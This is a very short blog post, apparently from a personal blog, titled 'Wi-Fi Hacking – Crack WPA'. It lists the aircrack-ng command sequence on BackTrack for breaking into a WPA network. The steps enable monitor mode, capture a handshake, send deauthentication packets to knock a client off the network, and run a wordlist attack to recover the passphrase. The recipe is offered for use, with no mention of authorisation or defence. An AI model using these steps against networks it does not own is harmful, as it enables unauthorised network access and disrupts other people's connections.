Wi-Fi Hacking – Crack WPA
Still using BackTrack OS. Step by step :
- airmon-ng stop ath0
- airmon-ng start wifi0
- airodump-ng ath0
- airodump-ng -c CHANNEL_NUMBER -w FILE_NAME –bssid MAC_AP ath0 [Wait until shakehand packet captured]
- aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENT ath0
- aircrack-ng -w FILE_WORD_LIST -b MAC_AP FILE_NAME*.cap
- Wait and see the passphrase
- done.
0 komentar:
Posting Komentar